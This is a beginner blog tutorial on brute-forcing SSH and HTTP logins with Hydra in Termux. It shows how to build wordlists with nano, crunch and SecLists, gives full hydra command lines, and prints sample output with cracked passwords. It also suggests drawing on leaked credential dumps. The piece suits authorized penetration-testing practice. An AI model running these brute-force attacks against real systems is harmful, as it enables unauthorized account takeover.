DevDigest

[2025 Guide] How to Use Custom Password Lists with Hydra in Termux

Learn how to use Custom Password Lists with Hydra in Termux. A beginner-friendly guide to smarter brute force attacks using your own wordlists.

Tags: , , , , , , , , , , , , , , , ,
Young Filipina hacker, Calista, with black-rimmed glasses and a hoodie, working on password cracking in a dark room filled with computer screens. Pin It!
Calista, the tech-savvy Filipina hacker, confidently cracking passwords in the shadows of her high-tech, dimly lit workspace.

The first time I tried brute forcing a login with Hydra on Termux, I failed—miserably. I was using a generic password list I found online, thinking that would be enough. It wasn’t. After hours of watching meaningless attempts pile up on my screen, I realized what every aspiring ethical hacker eventually learns: the real power lies in Custom Password Lists.

I started building my own—from old password dumps, leaked credentials, even personal patterns I’d observed in clients’ systems during pentests. Suddenly, things clicked. The success rate skyrocketed. My brute force attacks weren’t just louder—they were smarter.

If you’re a student, dev, or curious tinkerer diving into ethical hacking, this guide is for you. I’ll show you exactly how to use Custom Password Lists with Hydra in Termux—step by step, no fluff, no gatekeeping. Ready to upgrade your hacking toolkit?

Let’s get into it.

Important Note: This tutorial is intended solely for ethical hacking and legal penetration testing purposes. Unauthorized access or testing of systems without permission is illegal and punishable by law. Always ensure you have explicit consent before conducting any tests.

Download my FREE Hydra Cheat Sheet Now!

Table of Contents

Pin It!
Pin It!
Pin It!

What Makes a Good Custom Password List?

Not all wordlists are created equal. A powerful Custom Password List doesn’t just throw random guesses—it reflects patterns.

Here’s what makes a password list smart:

  • Context-aware entries: If you’re testing an app for Pinoy users, include names, birthdays, and common keyboard patterns like qwerty123, iloveyou, admin2025.
  • Hybrid formats: Mix dictionary words with numbers, special characters, and casing.
  • Short to long progression: Start with quick hits (6–8 characters) before going full 20-char chaos.

The goal? Prioritize likely over lengthy. Your list should aim to crack passwords fast, not brute force for hours.

· · ─ ·𖥸· ─ · ·

How to Create a Custom Password List from Scratch

There are many ways to build a custom list—but here’s the simplest approach right in Termux:

nano passwords.txt

Then type entries like:

password123
juan2025
admin!@#
letmein
iloveyou

Save and close with CTRL + X, then Y and Enter.

Want to generate them programmatically? Use crunch:

pkg install crunch
crunch 6 8 abc123 -o customlist.txt

This creates all combinations between 6–8 characters using abc123. Dangerous power—use responsibly.

· · ─ ·𖥸· ─ · ·

Where to Store the Password List in Termux

Hydra needs access to the file—so keep it somewhere safe and accessible.

Example:

~/hydra-lists/passwords.txt

You can create that folder:

mkdir -p ~/hydra-lists
mv passwords.txt ~/hydra-lists/

Then when running Hydra:

hydra -l admin -P ~/hydra-lists/passwords.txt target.com http-get

Avoid storing wordlists in system folders or shared storage unless you’re 100% sure of permissions.

· · ─ ·𖥸· ─ · ·

Installing Hydra in Termux (The Right Way)

Before you can unleash Hydra with your Custom Password Lists, you need to get it running inside Termux properly. No shady scripts, no bloated installs—just a clean setup that works.

This part is quick, but it matters. A lot of students run into errors here because they skip steps or don’t install required dependencies. Let’s avoid that mess.

Follow the steps below to install Hydra cleanly and prep Termux for action.

Step 1: Installing Hydra in Termux

First, ensure Hydra is installed on your Termux system.

Update your Termux packages:

pkg update && pkg upgrade

Explanation: Keeping your Termux environment up to date ensures smooth installation and compatibility for tools like Hydra.

Install Hydra:

pkg install hydra

Explanation: This command installs Hydra, a tool used for brute-force attacks on login credentials, along with all its dependencies.

Output:

hydra is successfully installed.

Step 2: Creating or Acquiring Custom Password Lists

A password list is a file containing potential passwords. Customizing these password lists ensures that you’re targeting the most relevant potential passwords for the task at hand.

Creating a Custom Password List: You can create a text file with potential passwords. Use nano to create your list in Termux:

nano custom_password_list.txt

Add passwords, each on a new line:

admin password123 letmein qwerty secretpass

Save the file by pressing CTRL+X, then Y, and Enter.

Downloading Pre-made Password Lists: You can download widely used password lists from sources like SecLists. These lists provide a broad range of potential passwords for different scenarios.

Download the SecLists repository:

git clone https://github.com/danielmiessler/SecLists.git

Step 3: Using Custom Password Lists with Hydra

Once your password lists are ready, you can run Hydra attacks using them. The basic command structure for Hydra with a password list is:

hydra -l <username> -P <password_list> <protocol>://<target_ip>

For example, to use the username admin and the custom list custom_password_list.txt to brute-force an SSH login:

hydra -l admin -P custom_password_list.txt ssh://192.168.1.10

Explanation: This command tells Hydra to brute-force the SSH login for the admin user on the server at 192.168.1.10 using the passwords in your custom password list.

Output:

Hydra v9.1 starting at 2024-10-05 17:30:02
[DATA] max 16 tasks per 1 server, overall 16 tasks, 0 login tries per task
[DATA] attacking ssh://192.168.1.10:22/
[22][ssh] host: 192.168.1.10   login: admin   password: letmein
1 of 1 target successfully completed, 1 valid password found

Step 4: Using Multiple Usernames and Password Lists

If you want to try multiple usernames in combination with your custom password lists, Hydra allows you to specify a username list as well:

hydra -L usernames.txt -P custom_password_list.txt ssh://192.168.1.10
  • -L usernames.txt: Specifies a file containing multiple usernames.
  • -P custom_password_list.txt: Specifies the custom password list.

Explanation: Hydra will try each username in usernames.txt with every password from your custom password list to brute-force the SSH server.

Output:

[22][ssh] host: 192.168.1.10   login: root   password: password123
[22][ssh] host: 192.168.1.10   login: admin   password: letmein

Step 5: Enhancing Custom Password Lists

To improve your chances of success, refine your custom password lists with the following strategies:

Research Industry-Specific Passwords: Tailor your list to include common passwords in the targeted organization or industry.

Generate Password Variations: Use tools like Crunch in Termux to generate variations:

crunch 8 12 abcdef123 -o generated_passwords.txt

This creates passwords of length 8 to 12 using the characters a-z, 0-9, and saves them to generated_passwords.txt.

Combine Lists: Merge common password lists with personalized or custom-generated lists to create hybrid attacks.

Pin It!

Troubleshooting Common Hydra Errors

Got stuck? You’re not alone. Here’s a quick fix-it table:

Error MessageLikely CauseFix
0 valid passwords foundWrong list or bad syntaxCheck if the username/password is valid manually
Broken pipe or Connection resetToo many threads or wrong serviceLower -t value, double-check protocol
Hydra not foundNot installed correctlypkg install hydra then retry
Permission deniedList file location errorchmod 644 on the password file

Tip: Run Hydra with -V to see every attempt—it’s slower, but great for debugging.

· · ─ ·𖥸· ─ · ·

What to Do After a Successful Attack

Success? Great. But remember: the goal is learning—not leaking.

Here’s what to do next:

  • Log it: Save the output somewhere (screenshots, notes, terminal logs).
  • Report it: If you’re doing ethical hacking on a target you own or have permission to test, report the weak credentials.
  • Improve it: Adjust your password list based on what worked.

This is where you start building intuition around real-world password behavior.

· · ─ ·𖥸· ─ · ·

Your Next Move in Ethical Hacking Starts Here

By now, you’ve seen how powerful Custom Password Lists can be when paired with Hydra on Termux. Whether you’re just starting out or already elbow-deep in cybersecurity tools, crafting your own wordlists isn’t just a flex—it’s a skill that sets you apart.

Every successful pentest, every cracked login, every “Aha!” moment starts with better tools and sharper techniques—and this is just the beginning.

If you found this guide helpful, stick around. I regularly share tutorials like this—no filler, just real-world tactics for devs, students, and ethical hackers building their skills from the command line up.

Subscribe to get more hands-on Termux hacks and FOSS-powered guides—delivered straight to your inbox.

Hydra SSH Password Cracking in Termux—Because Bruteforce Never Gets Tired

Leave a Reply

Your email address will not be published. Required fields are marked *

Comments (

)

  1. Amos

    magnificent post, very informative. I wonder why the other specialists of this sector do not notice this. You should continue your writing. I’m confident, you have a huge readers’ base already!

    Reply
    1. Sam Galope

      Thank you so much for the kind words! I really appreciate your support and encouragement. I’ll definitely keep writing—it’s feedback like this that motivates me. If you’re interested, you might enjoy this article: How to Integrate a Tilt Sensor with ESP32 for Motion-Sensing Projects. Thanks again! 😊

      Reply